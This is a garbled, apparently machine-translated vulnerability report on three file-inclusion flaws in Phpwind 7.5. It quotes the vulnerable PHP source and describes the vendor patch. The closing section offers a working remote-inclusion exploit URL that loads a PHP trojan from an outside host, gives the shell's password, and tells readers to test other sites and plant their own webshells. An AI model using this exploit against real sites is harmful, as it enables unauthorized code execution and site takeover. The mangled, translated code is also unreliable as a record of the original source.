Phpwind 7.5 0-day vulnerability exploitation (EXP released)

Phpwind 7.5 Multiple Include Vulnerabilities
I. Local vulnerability in api/class_base.php

1. Description

The $ mode variable in the callback function in the api/class_base.php file is not filtered, causing arbitrary inclusion of local files and thus arbitrary PHP commands can be executed.

2. Detailed Analysis

In the api/class_base.php file:

 
Function callback ($ mode, $ method, $ params ){
If (! Isset ($ this-> classdb [$ mode]) {
If (! File_exists (R_P.api/class _. $ mode .. php )){
Return new ErrorMsg (API_MODE_NOT_EXISTS, "Class ($ mode) Not Exists ");
}
Require_once (R_P.api/class _. $ mode .. php); // here
$ This-> classdb [$ mode] = new $ mode ($ this );
}
If (! Method_exists ($ this-> classdb [$ mode], $ method )){
Return new ErrorMsg (API_METHOD_NOT_EXISTS, "Method ($ method of $ mode) Not Exists ");
}
! Is_array ($ params) & $ params = array ();
Return @ call_user_func_array (array (& $ this-> classdb [$ mode], $ method), $ params );
}
Let's continue with the process of passing specific variables. The above functions are called in run:

Function run ($ request ){
$ Request = $ this-> strips ($ request );
If (isset ($ request [type]) & $ request [type] = uc ){
$ This-> type = uc;
$ This-> apikey = $ GLOBALS [uc_key]; // note that this variable is also the key to this vulnerability.
} Else {
$ This-> type = app;
$ This-> apikey = $ GLOBALS [db_siteownerid];
$ This-> siteappkey = $ GLOBALS [db_siteappkey];
}
/***
If ($ this-> type = app &&! $ GLOBALS [o_appifopen]) {
Return new ErrorMsg (API_CLOSED, App Closed );
}
***/
Ksort ($ request );
Reset ($ request );
$ Arg =;
Foreach ($ request as $ key => $ value ){
If ($ value & $ key! = Sig ){
$ Arg. = "$ key = $ value &";
}
}
If (md5 ($ arg. $ this-> apikey )! = $ Request [sig]) {// pay attention to this judgment and bypass it. the above code shows $ this-> apikey = $ GLOBALS [uc_key], and $ request [sig] We
// Can be controlled, so it is easy to bypass it
Return new ErrorMsg (API_SIGN_ERROR, Error Sign );
}
$ Mode = $ request [mode]; // get $ mode without filtering and directly enter the following callback ()
$ Method = $ request [method];
$ Params = isset ($ request [params])? Unserialize ($ request [params]): array ();
If (isset ($ params [appthreads]) {
If (pH _ version <5.2 ){
Require_once (R_P.api/class_json.php );
$ Json = new Services_JSON (true );
$ Params [appthreads] = $ json-> decode (@ gzuncompress ($ params [appthreads]);
} Else {
$ Params [appthreads] = json_decode (@ gzuncompress ($ params [appthreads]), true );
}
}
If ($ params & isset ($ request [charset]) {
$ Params = pwConvert ($ params, $ this-> charset, $ request [charset]);
}
Return $ this-> callback ($ mode, $ method, $ params); // call callback ()
}
Let's continue to look at the call of the run () function:

In the pw_api.php file:

$ Api = new api_client ();
$ Response = $ api-> run ($ _ POST + $ _ GET); // directly run the variable submitted by $ _ POST and $ _ GET.

The above analysis is a retrograde analysis of the entire vulnerability variable submission process. In fact, this vulnerability also contains a encoding and decoding question: require_once (R_P.api/class _. $ mode .. php); this requires bypassing magic quotes.
Contains easy files. See the first sentence of run ().

 
$ Request = $ this-> strips ($ request );

Strips () code:

Function strips ($ param ){
If (is_array ($ param )){
Foreach ($ param as $ key => $ value ){
$ Param [$ key] = $ this-> strips ($ value );
}
} Else {
$ Param = stripslashes ($ param); // The variable uses stripslashes directly, so we can directly bypass the magic quotes :)
}
Return $ param;
}

3. POC/EXP

Missing

4. FIX

Due to the vulnerability information leakage, the official website has fixed the vulnerability:

Http://www.phpwind.net/read-htm-tid-914851.html

Code:

 
Require_once Pcv (R_P.api/class _. $ mode .. php );

Function Pcv ($ filename, $ ifcheck = 1 ){
$ Tmpname = strtolower ($ filename );
$ Tmparray = array (http: //, ""); // the http: // filter means remote truncation is disabled.
$ Ifcheck & $ tmparray [] =...; // filtered out. This means that the Skip directory is not allowed.
If (str_replace ($ tmparray, $ tmpname )! = $ Tmpname ){
Exit (Forbidden );
}
Return $ filename;
}
From Pcv (), we can see that phpwind's patch style is very cumbersome. From this pcv alone, there are still many logic problems, such as http: // This filtering is funny, people cannot use ftp ://? ...

Ii. apps/share/index. php Remote Inclusion Vulnerability

1. Description

$ Route and $ basePath variables in apps/share/index. php are not initialized, resulting in remote or local inclusion of php files, resulting in arbitrary php Code Execution

2. Detailed Analysis

<? Php
If ($ route = "share "){
Require_once $ basePath./action/m_share.php;
} Elseif ($ route = "sharelink "){
Require_once $ basePath./action/m_sharelink.php;
}
?>
This vulnerability does not seem to need to be analyzed !!!! I suggest that the person who writes this code deduct the year-end bonus...

3. POC/EXP

Missing

4. FIX

Wait for the official patch. If you do not need it, delete the file directly.

3. apps/groups/index. php Remote Inclusion Vulnerability

1. Description

$ Route and $ basePath variables in apps/groups/index. php are not initialized, resulting in remote or local inclusion of php files, resulting in arbitrary php Code Execution

2. Detailed Analysis

<? Php
If ($ route = "groups "){
Require_once $ basePath./action/m_groups.php;
} Elseif ($ route = "group "){
Require_once $ basePath./action/m_group.php;
} Elseif ($ route = "galbum "){
Require_once $ basePath./action/m_galbum.php;
}
 

This vulnerability does not seem to need to be analyzed !!!! I suggest that the person who writes this code deduct the year-end bonus...

3. POC/EXP

Missing

4. FIX

Wait for the official patch. If you do not need it, delete the file directly.

Latest news officially released patch http://www.phpwind.net/read-htm-tid-914851.html
Use EXP under release
Http: // www. ######. ***/apps/groups/index. php? Route = groups & basePath = http://www.hackqing.cn/qing.txt?
Browser access
Http: // www. ######. ***/apps/groups/index. php? Route = groups & basePath = http://www.hackqing.cn/qing.txt? Password qing520
After the access, you can include the file and obtain the webshell (say hello to bring it, otherwise it will fail)
To test whether vulnerabilities exist on other sites,
Plus apps/groups/index. php? Route = groups & basePath = http://www.hackqing.cn/qing.txt? Access. If a shell is obtained, the vulnerability exists and is successfully exploited. If a shell is not obtained, the vulnerability is patched.
Http://www.hackqing.cn/qing.txt? This shell can be replaced with your own shell, which is handy for use.
Qing.txt Save the php Trojan

Author: Love Blog